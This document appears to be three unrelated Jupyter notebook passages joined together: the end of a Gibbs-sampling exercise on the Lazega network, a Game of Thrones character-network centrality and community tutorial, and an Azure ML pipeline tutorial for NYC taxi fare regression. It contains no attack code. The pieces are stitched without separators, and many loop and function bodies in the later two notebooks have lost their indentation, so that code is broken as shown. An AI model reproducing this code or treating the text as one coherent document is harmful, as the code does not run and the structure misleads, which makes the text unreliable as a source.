n_rounds = 500
# Count how often each node is in state 2 after the burn-in phase
counts = np.zeros(node_atts.shape[0])
for j in range(n_rounds):
    value = gibbs_one_round(lazega)
    if j >= burn_in:
        counts += (value == 2)
# Predict the more frequent state for each node in the sample
predicted = np.where(counts > (n_rounds - burn_in) / 2, 2, 1)
true_practice = get_att_array(lazega, 'true_practice')
unobserved = np.isnan(get_att_array(lazega, 'observed_practice'))
# Compare predictions against the true values on the unobserved nodes only
accuracy = np.mean(predicted[unobserved] == true_practice[unobserved]) * 100
print(accuracy)
# Perform a number of gibbs_one_round(lazega) sampling steps
#
# (Maybe after a certain number of burn-in iterations): keep count of how often the predicted_practice value of nodes
# with observed_practice == nan is in the two states 1 or 2.
#
# Predict the unobserved practice values as the more probable state in the Gibbs sample
#
# Compare your predicted values against the true values
```
Now that things are up and running, we can explore some of the properties of the model and the Gibbs sampling procedure:
**Task 5**:
<ul>
<li> Perform the Gibbs-prediction procedure several times and explore how stable the prediction results are. Apart from the final categorical prediction, you can also consider the actual frequencies of the two 'predicted_practice" states in your samples</li>
<li> Try different settings of the parameter values of the potential functions. Can you find a relationship between the parameter values, and the stability of the Gibbs sampling? </li>
<li> Also try different parameter settings in order to optimize prediction accuracy. In a real application, one would learn the parameter values by likelihood optimization based on the labeled training nodes. This is outside the scope of what we can do here, so let's do a simple grid search over parameter values instead (ugly!) and evaluate by checking accuracy using the known actual labels for the test nodes (knowing that -- in principle -- this is forbidden!).</li>
</ul>
```
##run it several times and note the results
##
```
##### Let's change gears and talk about Game of thrones or shall I say Network of Thrones.
It is surprising, right? What is the relationship between a fantasy TV show/novel and network science or Python (it's not related to a dragon)?

Andrew J. Beveridge, an associate professor of mathematics at Macalester College, and Jie Shan, an undergraduate, created a network from the book A Storm of Swords by extracting relationships between characters to find the most important characters in the book (or GoT).
The dataset is publicly available for all 5 books at https://github.com/mathbeveridge/asoiaf. This is an interaction network, created by connecting two characters whenever their names (or nicknames) appeared within 15 words of one another in one of the books. The edge weight corresponds to the number of interactions.
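To make the construction concrete, here is a toy sketch of the within-15-words idea (this is not the authors' actual extraction code; the sentence and names are made up):

```
import re
from itertools import combinations
from collections import Counter

def cooccurrence_edges(text, names, window=15):
    # Count, for each pair of names, how often they occur
    # within `window` words of one another.
    words = re.findall(r"\w+", text)
    positions = {n: [i for i, w in enumerate(words) if w == n] for n in names}
    edges = Counter()
    for a, b in combinations(names, 2):
        for i in positions[a]:
            for j in positions[b]:
                if abs(i - j) <= window:
                    edges[(a, b)] += 1
    return edges

print(cooccurrence_edges("Jon met Arya then Jon left", ["Jon", "Arya"]))
# Counter({('Jon', 'Arya'): 2})
```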
Credits:
Blog: https://networkofthrones.wordpress.com
Math Horizons Article: https://www.maa.org/sites/default/files/pdf/Mathhorizons/NetworkofThrones%20%281%29.pdf
```
import pandas as pd
import networkx as nx
import matplotlib.pyplot as plt
import community
import warnings
warnings.filterwarnings('ignore')
%matplotlib inline
book1 = pd.read_csv('data/asoiaf-book1-edges.csv')
book2 = pd.read_csv('data/asoiaf-book2-edges.csv')
book3 = pd.read_csv('data/asoiaf-book3-edges.csv')
book4 = pd.read_csv('data/asoiaf-book4-edges.csv')
book5 = pd.read_csv('data/asoiaf-book5-edges.csv')
G_book1 = nx.Graph()
G_book2 = nx.Graph()
G_book3 = nx.Graph()
G_book4 = nx.Graph()
G_book5 = nx.Graph()
for row in book1.iterrows():
G_book1.add_edge(row[1]['Source'], row[1]['Target'], weight=row[1]['weight'], book=row[1]['book'])
for row in book2.iterrows():
G_book2.add_edge(row[1]['Source'], row[1]['Target'], weight=row[1]['weight'], book=row[1]['book'])
for row in book3.iterrows():
G_book3.add_edge(row[1]['Source'], row[1]['Target'], weight=row[1]['weight'], book=row[1]['book'])
for row in book4.iterrows():
G_book4.add_edge(row[1]['Source'], row[1]['Target'], weight=row[1]['weight'], book=row[1]['book'])
for row in book5.iterrows():
G_book5.add_edge(row[1]['Source'], row[1]['Target'], weight=row[1]['weight'], book=row[1]['book'])
G_book1.edges(data=True)
```
### Finding the most important node i.e character in these networks.
We'll compare different centralities to find the importance of nodes in this network. There is no one right way of calculating it; every approach has a different meaning. Let's start with degree centrality, which is defined as the degree of a node divided by a normalising factor n-1, where n is the number of nodes.
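As a quick illustration of the definition (on a toy graph, not the book network):

```
# Degree centrality = degree / (n - 1): the fraction of other
# nodes a node is directly connected to.
adj = {'a': {'b', 'c'}, 'b': {'a'}, 'c': {'a'}}
n = len(adj)
dc = {v: len(nbrs) / (n - 1) for v, nbrs in adj.items()}
print(dc)  # {'a': 1.0, 'b': 0.5, 'c': 0.5}
```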
```
list(G_book1.neighbors('Jaime-Lannister'))
```
##### nx.degree_centrality(graph) returns a dictionary where keys are the nodes and values are the corresponding degree centrality. Let's find the ten most important characters according to degree centrality.
```
sorted(nx.degree_centrality(G_book1).items(), key=lambda x:x[1], reverse=True)[0:10]
# Plot a histogram of degree centrality
plt.hist(list(nx.degree_centrality(G_book4).values()))
plt.show()
```
### Exercise
Create a new centrality measure, weighted_degree_centrality(Graph, weight), which takes in a graph and the weight attribute and returns a weighted degree centrality dictionary. Weighted degree is calculated by summing the weights of all edges of a node, and is normalised by dividing by the total weight of the graph (the sum of the weighted degrees of all nodes). Find the top characters according to this measure.
```
def weighted_degree_centrality(G, weight):
result = dict()
total = 0
for node in G.nodes():
weight_degree = 0
for n in G.edges([node], data=True):
weight_degree += n[2]['weight']
result[node] = weight_degree
total += weight_degree
for node, value in result.items():
result[node] = value/total
return result
plt.hist(list(weighted_degree_centrality(G_book1, 'weight').values()))
plt.show()
sorted(weighted_degree_centrality(G_book1, 'weight').items(), key=lambda x:x[1], reverse=True)[0:10]
sum(list(weighted_degree_centrality(G_book1, 'weight').values()))
```
##### Betweenness centrality
From Wikipedia:
For every pair of vertices in a connected graph, there exists at least one shortest path between the vertices such that either the number of edges that the path passes through (for unweighted graphs) or the sum of the weights of the edges (for weighted graphs) is minimized. The betweenness centrality for each vertex is the number of these shortest paths that pass through the vertex.
```
# unweighted
sorted(nx.betweenness_centrality(G_book1).items(), key=lambda x:x[1], reverse=True)[0:10]
sorted(nx.betweenness_centrality(G_book1, weight='weight').items(), key=lambda x:x[1], reverse=True)[0:10]
```
#### PageRank
The billion dollar algorithm, PageRank works by counting the number and quality of links to a page to determine a rough estimate of how important the website is. The underlying assumption is that more important websites are likely to receive more links from other websites.
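The idea can be sketched in a few lines of plain Python (a toy power-iteration implementation, not what networkx uses internally):

```
def pagerank_toy(adj, d=0.85, iters=100):
    # adj maps each node to its list of out-neighbours.
    nodes = list(adj)
    n = len(nodes)
    rank = {v: 1.0 / n for v in nodes}
    for _ in range(iters):
        # every node gets a teleportation share, plus a share of the
        # rank of each node that links to it
        new = {v: (1 - d) / n for v in nodes}
        for v, outs in adj.items():
            for w in outs:
                new[w] += d * rank[v] / len(outs)
        rank = new
    return rank

# 'c' is linked to by both 'a' and 'b', so it ends up with the highest rank
r = pagerank_toy({'a': ['c'], 'b': ['c'], 'c': ['a']})
print(max(r, key=r.get))
```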
```
# by default weight attribute in pagerank is weight, so we use weight=None to find the unweighted results
sorted(nx.pagerank_numpy(G_book1, weight=None).items(), key=lambda x:x[1], reverse=True)[0:10]
sorted(nx.pagerank_numpy(G_book1, weight='weight').items(), key=lambda x:x[1], reverse=True)[0:10]
```
### Is there a correlation between these techniques?
#### Exercise
Find the correlation between these three techniques.
```
cor = pd.DataFrame.from_records([nx.pagerank_numpy(G_book1, weight='weight'), nx.betweenness_centrality(G_book1, weight='weight'), weighted_degree_centrality(G_book1, 'weight')])
cor.T
```
#### What can we infer from this correlation matrix between these three methods?
```
cor.T.corr()
```
Till now we have been analysing only the first book, but what about the other 4 books? We can now look at the evolution of this character interaction network across the books, which adds temporality to the analysis.
```
evol = [weighted_degree_centrality(graph, 'weight') for graph in [G_book1, G_book2, G_book3, G_book4, G_book5]]
evol_df = pd.DataFrame.from_records(evol).fillna(0)
evol_df
pd.DataFrame.from_records(evol).max(axis=0).sort_values(ascending=False)[0:10]
```
##### Exercise
Plot the evolution of weighted degree centrality of the above mentioned characters over the 5 books, and repeat the same exercise for betweenness centrality.
```
evol_df[list(pd.DataFrame.from_records(evol).max(axis=0).sort_values(ascending=False)[0:10].index)].plot(figsize=(14,10))
plt.show()
evol = [nx.betweenness_centrality(graph, weight='weight') for graph in [G_book1, G_book2, G_book3, G_book4, G_book5]]
evol_df = pd.DataFrame.from_records(evol).fillna(0)
evol_df[list(pd.DataFrame.from_records(evol).max(axis=0).sort_values(ascending=False)[0:10].index)].plot(figsize=(14,10))
plt.show()
```
Where is Stannis Baratheon in the degree centrality measure? Not even in the top 10. Strange?
#### Community detection in Networks
A network is said to have community structure if the nodes of the network can be easily grouped into (potentially overlapping) sets of nodes such that each set of nodes is densely connected internally.
We will use the Louvain community detection algorithm to find the modules in our graph.
```
partition = community.best_partition(G_book1)
size = float(len(set(partition.values())))
pos = nx.spring_layout(G_book1)
count = 0.
for com in set(partition.values()) :
count = count + 1.
list_nodes = [nodes for nodes in partition.keys()
if partition[nodes] == com]
nx.draw_networkx_nodes(G_book1, pos, list_nodes, node_size = 20,
node_color = str(count / size))
nx.draw_networkx_edges(G_book1, pos, alpha=0.5)
plt.show()
d = {}
for character, par in partition.items():
if par in d:
d[par].append(character)
else:
d[par] = [character]
d
nx.draw(nx.subgraph(G_book1, d[1]))
nx.density(G_book1)
nx.density(nx.subgraph(G_book1, d[1]))
nx.density(nx.subgraph(G_book1, d[1]))/nx.density(G_book1)
```
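For reference, the density computed by ```nx.density``` for an undirected graph is $2m/(n(n-1))$, the fraction of possible edges actually present. A tiny standalone check:

```
def density(n_nodes, n_edges):
    # Undirected graph density: edges present / edges possible
    return 2 * n_edges / (n_nodes * (n_nodes - 1))

print(density(4, 3))  # 3 of 6 possible edges -> 0.5
```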
#### Exercise
Find the most important node in the partitions according to pagerank, degree centrality and betweenness centrality of the nodes.
```
max_d = {}
page = nx.pagerank(G_book1)
for par in d:
    temp = 0
    for chars in d[par]:
        if page[chars] > temp:
            temp = page[chars]
            max_d[par] = chars
max_d
max_d = {}
page = nx.betweenness_centrality(G_book1)
for par in d:
    temp = 0
    for chars in d[par]:
        if page[chars] > temp:
            temp = page[chars]
            max_d[par] = chars
max_d
max_d = {}
page = nx.degree_centrality(G_book1)
for par in d:
    temp = 0
    for chars in d[par]:
        if page[chars] > temp:
            temp = page[chars]
            max_d[par] = chars
max_d
d[8]
```
Copyright (c) Microsoft Corporation. All rights reserved.
Licensed under the MIT License.

# NYC Taxi Data Regression Model
This is an [Azure Machine Learning Pipelines](https://aka.ms/aml-pipelines) version of two-part tutorial ([Part 1](https://docs.microsoft.com/en-us/azure/machine-learning/service/tutorial-data-prep), [Part 2](https://docs.microsoft.com/en-us/azure/machine-learning/service/tutorial-auto-train-models)) available for Azure Machine Learning.
You can combine the two part tutorial into one using AzureML Pipelines as Pipelines provide a way to stitch together various steps involved (like data preparation and training in this case) in a machine learning workflow.
In this notebook, you learn how to prepare data for regression modeling by using open source library [pandas](https://pandas.pydata.org/). You run various transformations to filter and combine two different NYC taxi datasets. Once you prepare the NYC taxi data for regression modeling, then you will use [AutoMLStep](https://docs.microsoft.com/python/api/azureml-train-automl-runtime/azureml.train.automl.runtime.automl_step.automlstep?view=azure-ml-py) available with [Azure Machine Learning Pipelines](https://aka.ms/aml-pipelines) to define your machine learning goals and constraints as well as to launch the automated machine learning process. The automated machine learning technique iterates over many combinations of algorithms and hyperparameters until it finds the best model based on your criterion.
After you complete building the model, you can predict the cost of a taxi trip by training a model on data features. These features include the pickup day and time, the number of passengers, and the pickup location.
## Prerequisite
If you are using an Azure Machine Learning Notebook VM, you are all set. Otherwise, make sure you go through the configuration Notebook located at https://github.com/Azure/MachineLearningNotebooks first if you haven't. This sets you up with a working config file that has information on your workspace, subscription id, etc.
## Prepare data for regression modeling
First, we will prepare data for regression modeling. We will leverage the convenience of Azure Open Datasets along with the power of Azure Machine Learning service to create a regression model to predict NYC taxi fare prices. Perform `pip install azureml-opendatasets` to get the open dataset package. The Open Datasets package contains a class representing each data source (NycTlcGreen and NycTlcYellow) to easily filter date parameters before downloading.
### Load data
Begin by creating a dataframe to hold the taxi data. When working in a non-Spark environment, Open Datasets only allows downloading one month of data at a time with certain classes to avoid MemoryError with large datasets. To download a year of taxi data, iteratively fetch one month at a time, and before appending it to green_df_raw, randomly sample 500 records from each month to avoid bloating the dataframe. Then preview the data. To keep this process short, we are sampling data of only 1 month.
Note: Open Datasets has mirroring classes for working in Spark environments where data size and memory aren't a concern.
```
import azureml.core
# Check core SDK version number
print("SDK version:", azureml.core.VERSION)
from azureml.opendatasets import NycTlcGreen, NycTlcYellow
import pandas as pd
from datetime import datetime
from dateutil.relativedelta import relativedelta
green_df_raw = pd.DataFrame([])
start = datetime.strptime("1/1/2016","%m/%d/%Y")
end = datetime.strptime("1/31/2016","%m/%d/%Y")
number_of_months = 1
sample_size = 5000
for sample_month in range(number_of_months):
temp_df_green = NycTlcGreen(start + relativedelta(months=sample_month), end + relativedelta(months=sample_month)) \
.to_pandas_dataframe()
green_df_raw = green_df_raw.append(temp_df_green.sample(sample_size))
yellow_df_raw = pd.DataFrame([])
start = datetime.strptime("1/1/2016","%m/%d/%Y")
end = datetime.strptime("1/31/2016","%m/%d/%Y")
sample_size = 500
for sample_month in range(number_of_months):
temp_df_yellow = NycTlcYellow(start + relativedelta(months=sample_month), end + relativedelta(months=sample_month)) \
.to_pandas_dataframe()
yellow_df_raw = yellow_df_raw.append(temp_df_yellow.sample(sample_size))
```
### See the data
```
from IPython.display import display
display(green_df_raw.head(5))
display(yellow_df_raw.head(5))
```
### Download data locally and then upload to Azure Blob
This is a one-time process to save the data in the default datastore.
```
import os
dataDir = "data"
if not os.path.exists(dataDir):
os.mkdir(dataDir)
greenDir = dataDir + "/green"
yelloDir = dataDir + "/yellow"
if not os.path.exists(greenDir):
os.mkdir(greenDir)
if not os.path.exists(yelloDir):
os.mkdir(yelloDir)
greenTaxiData = greenDir + "/unprepared.parquet"
yellowTaxiData = yelloDir + "/unprepared.parquet"
# Note: despite the .parquet file names, the data is written as CSV
green_df_raw.to_csv(greenTaxiData, index=False)
yellow_df_raw.to_csv(yellowTaxiData, index=False)
print("Data written to local folder.")
from azureml.core import Workspace
ws = Workspace.from_config()
print("Workspace: " + ws.name, "Region: " + ws.location, sep = '\n')
# Default datastore
default_store = ws.get_default_datastore()
default_store.upload_files([greenTaxiData],
target_path = 'green',
overwrite = True,
show_progress = True)
default_store.upload_files([yellowTaxiData],
target_path = 'yellow',
overwrite = True,
show_progress = True)
print("Upload calls completed.")
```
### Create and register datasets
By creating a dataset, you create a reference to the data source location. If you applied any subsetting transformations to the dataset, they will be stored in the dataset as well. You can learn more about the what subsetting capabilities are supported by referring to [our documentation](https://docs.microsoft.com/en-us/python/api/azureml-core/azureml.data.tabular_dataset.tabulardataset?view=azure-ml-py#remarks). The data remains in its existing location, so no extra storage cost is incurred.
```
from azureml.core import Dataset
green_taxi_data = Dataset.Tabular.from_delimited_files(default_store.path('green/unprepared.parquet'))
yellow_taxi_data = Dataset.Tabular.from_delimited_files(default_store.path('yellow/unprepared.parquet'))
```
Register the taxi datasets with the workspace so that you can reuse them in other experiments or share with your colleagues who have access to your workspace.
```
green_taxi_data = green_taxi_data.register(ws, 'green_taxi_data')
yellow_taxi_data = yellow_taxi_data.register(ws, 'yellow_taxi_data')
```
### Setup Compute
#### Create new or use an existing compute
> Note that if you have an AzureML Data Scientist role, you will not have permission to create compute resources. Talk to your workspace or IT admin to create the compute targets described in this section, if they do not already exist.
```
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
# Choose a name for your CPU cluster
amlcompute_cluster_name = "cpu-cluster"
# Verify that cluster does not exist already
try:
aml_compute = ComputeTarget(workspace=ws, name=amlcompute_cluster_name)
print('Found existing cluster, use it.')
except ComputeTargetException:
compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_D2_V2',
max_nodes=4)
aml_compute = ComputeTarget.create(ws, amlcompute_cluster_name, compute_config)
aml_compute.wait_for_completion(show_output=True)
```
#### Define RunConfig for the compute
We will also use `pandas`, `scikit-learn`, `automl` and `pyarrow` for the pipeline steps, so we define a `runconfig` that includes them.
```
from azureml.core.runconfig import RunConfiguration
from azureml.core.conda_dependencies import CondaDependencies
# Create a new runconfig object
aml_run_config = RunConfiguration()
# Use the aml_compute you created above.
aml_run_config.target = aml_compute
# Enable Docker
aml_run_config.environment.docker.enabled = True
# Use conda_dependencies.yml to create a conda environment in the Docker image for execution
aml_run_config.environment.python.user_managed_dependencies = False
# Specify CondaDependencies obj, add necessary packages
aml_run_config.environment.python.conda_dependencies = CondaDependencies.create(
    conda_packages=['pandas', 'scikit-learn'],
    pip_packages=['azureml-sdk[automl]', 'pyarrow'])
print("Run configuration created.")
```
### Prepare data
Now we will prepare for regression modeling by using `pandas`. We run various transformations to filter and combine two different NYC taxi datasets.
We achieve this by creating a separate step for each transformation; this lets us reuse the steps and avoids re-running everything when only one transformation changes. We will keep data preparation scripts in one subfolder and training scripts in another.
> The best practice is to use separate folders for each step's scripts and dependent files, and to specify that folder as the step's `source_directory`. This reduces the size of the snapshot created for the step (only the specific folder is snapshotted). Since a change to any file in the `source_directory` triggers a re-upload of the snapshot, separate folders preserve step reuse when nothing in a given step's `source_directory` has changed.
#### Define Useful Columns
Here we are defining a set of "useful" columns for both Green and Yellow taxi data.
```
display(green_df_raw.columns)
display(yellow_df_raw.columns)
# useful columns needed for the Azure Machine Learning NYC Taxi tutorial
useful_columns = str(["cost", "distance", "dropoff_datetime", "dropoff_latitude",
                      "dropoff_longitude", "passengers", "pickup_datetime",
                      "pickup_latitude", "pickup_longitude", "store_forward", "vendor"]).replace(",", ";")
print("Useful columns defined.")
```
#### Cleanse Green taxi data
```
import os

from azureml.pipeline.core import PipelineData
from azureml.pipeline.steps import PythonScriptStep

# python scripts folder
prepare_data_folder = './scripts/prepdata'
# rename columns as per Azure Machine Learning NYC Taxi tutorial
green_columns = str({
    "vendorID": "vendor",
    "lpepPickupDatetime": "pickup_datetime",
    "lpepDropoffDatetime": "dropoff_datetime",
    "storeAndFwdFlag": "store_forward",
    "pickupLongitude": "pickup_longitude",
    "pickupLatitude": "pickup_latitude",
    "dropoffLongitude": "dropoff_longitude",
    "dropoffLatitude": "dropoff_latitude",
    "passengerCount": "passengers",
    "fareAmount": "cost",
    "tripDistance": "distance"
}).replace(",", ";")
# Define output after cleansing step
cleansed_green_data = PipelineData("cleansed_green_data", datastore=default_store).as_dataset()
print('Cleanse script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# cleansing step creation
# See the cleanse.py for details about input and output
cleansingStepGreen = PythonScriptStep(
    name="Cleanse Green Taxi Data",
    script_name="cleanse.py",
    arguments=["--useful_columns", useful_columns,
               "--columns", green_columns,
               "--output_cleanse", cleansed_green_data],
    inputs=[green_taxi_data.as_named_input('raw_data')],
    outputs=[cleansed_green_data],
    compute_target=aml_compute,
    runconfig=aml_run_config,
    source_directory=prepare_data_folder,
    allow_reuse=True
)
print("cleansingStepGreen created.")
```
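The `str(...).replace(",", ";")` trick above serializes the column list and rename map into single command-line arguments, since commas would otherwise interfere with argument parsing. `cleanse.py` itself is not shown in this notebook, but a sketch of how it might recover the original Python objects could look like the following (the helper name `parse_columns_arg` is a hypothetical illustration, not the tutorial's actual code):

```python
import ast

def parse_columns_arg(arg):
    # Hypothetical helper: undo the comma -> semicolon substitution and
    # evaluate the literal back into a Python list or dict.
    return ast.literal_eval(arg.replace(";", ","))

# Round-trip a rename map the same way the notebook serializes green_columns
serialized = str({"vendorID": "vendor", "tripDistance": "distance"}).replace(",", ";")
columns = parse_columns_arg(serialized)
print(columns)  # {'vendorID': 'vendor', 'tripDistance': 'distance'}
```

This only works because none of the column names contain commas or semicolons themselves.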
#### Cleanse Yellow taxi data
```
yellow_columns = str({
    "vendorID": "vendor",
    "tpepPickupDateTime": "pickup_datetime",
    "tpepDropoffDateTime": "dropoff_datetime",
    "storeAndFwdFlag": "store_forward",
    "startLon": "pickup_longitude",
    "startLat": "pickup_latitude",
    "endLon": "dropoff_longitude",
    "endLat": "dropoff_latitude",
    "passengerCount": "passengers",
    "fareAmount": "cost",
    "tripDistance": "distance"
}).replace(",", ";")
# Define output after cleansing step
cleansed_yellow_data = PipelineData("cleansed_yellow_data", datastore=default_store).as_dataset()
print('Cleanse script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# cleansing step creation
# See the cleanse.py for details about input and output
cleansingStepYellow = PythonScriptStep(
    name="Cleanse Yellow Taxi Data",
    script_name="cleanse.py",
    arguments=["--useful_columns", useful_columns,
               "--columns", yellow_columns,
               "--output_cleanse", cleansed_yellow_data],
    inputs=[yellow_taxi_data.as_named_input('raw_data')],
    outputs=[cleansed_yellow_data],
    compute_target=aml_compute,
    runconfig=aml_run_config,
    source_directory=prepare_data_folder,
    allow_reuse=True
)
print("cleansingStepYellow created.")
```
#### Merge cleansed Green and Yellow datasets
We are creating a single data source by merging the cleansed versions of Green and Yellow taxi data.
```
# Define output after merging step
merged_data = PipelineData("merged_data", datastore=default_store).as_dataset()
print('Merge script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# merging step creation
# See the merge.py for details about input and output
mergingStep = PythonScriptStep(
    name="Merge Taxi Data",
    script_name="merge.py",
    arguments=["--output_merge", merged_data],
    inputs=[cleansed_green_data.parse_parquet_files(),
            cleansed_yellow_data.parse_parquet_files()],
    outputs=[merged_data],
    compute_target=aml_compute,
    runconfig=aml_run_config,
    source_directory=prepare_data_folder,
    allow_reuse=True
)
print("mergingStep created.")
```
#### Filter data
This step filters out coordinates for locations that are outside the city border. We use a TypeConverter object to change the latitude and longitude fields to decimal type.
```
# Define output after filter step
filtered_data = PipelineData("filtered_data", datastore=default_store).as_dataset()

print('Filter script is in {}.'.format(os.path.realpath(prepare_data_folder)))

# filter step creation
# See the filter.py for details about input and output
filterStep = PythonScriptStep(
    name="Filter Taxi Data",
    script_name="filter.py",
    arguments=["--output_filter", filtered_data],
    inputs=[merged_data.parse_parquet_files()],
    outputs=[filtered_data],
    compute_target=aml_compute,
    runconfig=aml_run_config,
    source_directory=prepare_data_folder,
    allow_reuse=True
)
print("filterStep created.")
```
#### Normalize data
In this step, we split the pickup and dropoff datetime values into the respective date and time columns and then we rename the columns to use meaningful names.
```
# Define output after normalize step
normalized_data = PipelineData("normalized_data", datastore=default_store).as_dataset()
print('Normalize script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# normalize step creation
# See the normalize.py for details about input and output
normalizeStep = PythonScriptStep(
    name="Normalize Taxi Data",
    script_name="normalize.py",
    arguments=["--output_normalize", normalized_data],
    inputs=[filtered_data.parse_parquet_files()],
    outputs=[normalized_data],
    compute_target=aml_compute,
    runconfig=aml_run_config,
    source_directory=prepare_data_folder,
    allow_reuse=True
)
print("normalizeStep created.")
```
#### Transform data
Transform the normalized taxi data into the final required format. This step does the following:
- Splits the pickup and dropoff date further into day of the week, day of the month, and month values.
- Uses the `derive_column_by_example()` function to get the day-of-the-week value. The function takes an array of example objects that define the input data and the preferred output, and automatically determines the preferred transformation. For the pickup and dropoff time columns, splits the time into hour, minute, and second by using the `split_column_by_example()` function with no example parameter.
- After the new features are generated, uses the `drop_columns()` function to delete the original fields, as the newly generated features are preferred.
- Renames the rest of the fields to use meaningful descriptions.
```
# Define output after transform step
transformed_data = PipelineData("transformed_data", datastore=default_store).as_dataset()
print('Transform script is in {}.'.format(os.path.realpath(prepare_data_folder)))
# transform step creation
# See the transform.py for details about input and output
transformStep = PythonScriptStep(
    name="Transform Taxi Data",
    script_name="transform.py",
    arguments=["--output_transform", transformed_data],
    inputs=[normalized_data.parse_parquet_files()],
    outputs=[transformed_data],
    compute_target=aml_compute,
    runconfig=aml_run_config,
    source_directory=prepare_data_folder,
    allow_reuse=True
)
print("transformStep created.")
```
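The `transform.py` script (and the Data Prep by-example functions it relies on) is not shown in this notebook. As a hedged approximation, the datetime feature extraction described above can be sketched in plain pandas; the column names follow the tutorial's conventions, but the `add_datetime_features` helper itself is an illustration, not the tutorial's code:

```python
import pandas as pd

def add_datetime_features(df):
    """Sketch of the transform step: derive weekday, day-of-month, month,
    hour, minute, and second from the pickup datetime, then drop the
    original column since the derived features are preferred."""
    dt = pd.to_datetime(df["pickup_datetime"])
    return df.assign(
        pickup_weekday=dt.dt.day_name(),
        pickup_monthday=dt.dt.day,
        pickup_month=dt.dt.month,
        pickup_hour=dt.dt.hour,
        pickup_minute=dt.dt.minute,
        pickup_second=dt.dt.second,
    ).drop(columns=["pickup_datetime"])

trips = pd.DataFrame({"pickup_datetime": ["2013-08-22 17:22:00"]})
print(add_datetime_features(trips).iloc[0]["pickup_weekday"])  # Thursday
```

The same transformation would be applied to the dropoff datetime column.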
### Split the data into train and test sets
This step splits the data into one dataset for model training and another for testing.
```
train_model_folder = './scripts/trainmodel'

# train and test splits output
output_split_train = PipelineData("output_split_train", datastore=default_store).as_dataset()
output_split_test = PipelineData("output_split_test", datastore=default_store).as_dataset()

print('Data split script is in {}.'.format(os.path.realpath(train_model_folder)))
# test train split step creation
# See the train_test_split.py for details about input and output
testTrainSplitStep = PythonScriptStep(
    name="Train Test Data Split",
    script_name="train_test_split.py",
    arguments=["--output_split_train", output_split_train,
               "--output_split_test", output_split_test],
    inputs=[transformed_data.parse_parquet_files()],
    outputs=[output_split_train, output_split_test],
    compute_target=aml_compute,
    runconfig=aml_run_config,
    source_directory=train_model_folder,
    allow_reuse=True
)
print("testTrainSplitStep created.")
```
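The `train_test_split.py` script is not shown in this notebook. A minimal sketch of what it might do, assuming a random row-wise split (the split fraction and seed here are illustrative assumptions, not the tutorial's actual values):

```python
import pandas as pd

def split_train_test(df, train_frac=0.8, seed=223):
    """Hypothetical split: sample a training fraction at random and
    use the remaining rows as the held-out test set."""
    train = df.sample(frac=train_frac, random_state=seed)
    test = df.drop(train.index)
    return train, test

data = pd.DataFrame({"cost": range(10), "distance": range(10)})
train, test = split_train_test(data)
print(len(train), len(test))  # 8 2
```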
## Use automated machine learning to build regression model
Now we will use **automated machine learning** to build the regression model. We will use [AutoMLStep](https://docs.microsoft.com/python/api/azureml-train-automl-runtime/azureml.train.automl.runtime.automl_step.automlstep?view=azure-ml-py) in AML Pipelines for this part. Run `pip install azureml-sdk[automl]` to get the automated machine learning package. Automated ML uses various features from the dataset to build a model that relates those features to the price of a taxi trip.
### Automatically train a model
#### Create experiment
```
from azureml.core import Experiment
experiment = Experiment(ws, 'NYCTaxi_Tutorial_Pipelines')
print("Experiment created")
```
#### Define settings for autogeneration and tuning
Here we define the experiment parameters and model settings for autogeneration and tuning. We can also pass `automl_settings` to `AutoMLConfig` as `**kwargs`.
Use your defined training settings as a parameter to an `AutoMLConfig` object. Additionally, specify your training data and the type of model, which is `regression` in this case.
Note: When using AmlCompute, we can't pass Numpy arrays directly to the fit method.
```
from azureml.train.automl import AutoMLConfig
# Change iterations to a reasonable number (50) to get better accuracy
automl_settings = {
    "iteration_timeout_minutes": 10,
    "iterations": 2,
    "primary_metric": 'spearman_correlation',
    "n_cross_validations": 5
}
training_dataset = output_split_train.parse_parquet_files().keep_columns(['pickup_weekday','pickup_hour', 'distance','passengers', 'vendor', 'cost'])
automl_config = AutoMLConfig(task='regression',
                             debug_log='automated_ml_errors.log',
                             path=train_model_folder,
                             compute_target=aml_compute,
                             featurization='auto',
                             training_data=training_dataset,
                             label_column_name='cost',
                             **automl_settings)
print("AutoML config created.")
```
#### Define AutoMLStep
```
from azureml.pipeline.steps import AutoMLStep
trainWithAutomlStep = AutoMLStep(name='AutoML_Regression',
                                 automl_config=automl_config,
                                 allow_reuse=True)
print("trainWithAutomlStep created.")
```
#### Build and run the pipeline
```
from azureml.pipeline.core import Pipeline
from azureml.widgets import RunDetails
pipeline_steps = [trainWithAutomlStep]
pipeline = Pipeline(workspace = ws, steps=pipeline_steps)
print("Pipeline is built.")
pipeline_run = experiment.submit(pipeline, regenerate_outputs=False)
print("Pipeline submitted for execution.")
RunDetails(pipeline_run).show()
```
### Explore the results
```
# Before we proceed we need to wait for the run to complete.
pipeline_run.wait_for_completion(show_output=False)
# functions to download output to local and fetch as dataframe
import os
import pandas as pd

def get_download_path(download_path, output_name):
    output_folder = os.listdir(download_path + '/azureml')[0]
    path = download_path + '/azureml/' + output_folder + '/' + output_name
    return path

def fetch_df(current_step, output_name):
    output_data = current_step.get_output_data(output_name)
    download_path = './outputs/' + output_name
    output_data.download(download_path, overwrite=True)
    df_path = get_download_path(download_path, output_name) + '/processed.parquet'
    return pd.read_parquet(df_path)
```
#### View cleansed taxi data
```
green_cleanse_step = pipeline_run.find_step_run(cleansingStepGreen.name)[0]
yellow_cleanse_step = pipeline_run.find_step_run(cleansingStepYellow.name)[0]
cleansed_green_df = fetch_df(green_cleanse_step, cleansed_green_data.name)
cleansed_yellow_df = fetch_df(yellow_cleanse_step, cleansed_yellow_data.name)
display(cleansed_green_df.head(5))
display(cleansed_yellow_df.head(5))
```
#### View the combined taxi data profile
```
merge_step = pipeline_run.find_step_run(mergingStep.name)[0]
combined_df = fetch_df(merge_step, merged_data.name)
display(combined_df.describe())
```
#### View the filtered taxi data profile
```
filter_step = pipeline_run.find_step_run(filterStep.name)[0]
filtered_df = fetch_df(filter_step, filtered_data.name)
display(filtered_df.describe())
```
#### View normalized taxi data
```
normalize_step = pipeline_run.find_step_run(normalizeStep.name)[0]
normalized_df = fetch_df(normalize_step, normalized_data.name)
display(normalized_df.head(5))
```
#### View transformed taxi data
```
transform_step = pipeline_run.find_step_run(transformStep.name)[0]
transformed_df = fetch_df(transform_step, transformed_data.name)
display(transformed_df.describe())
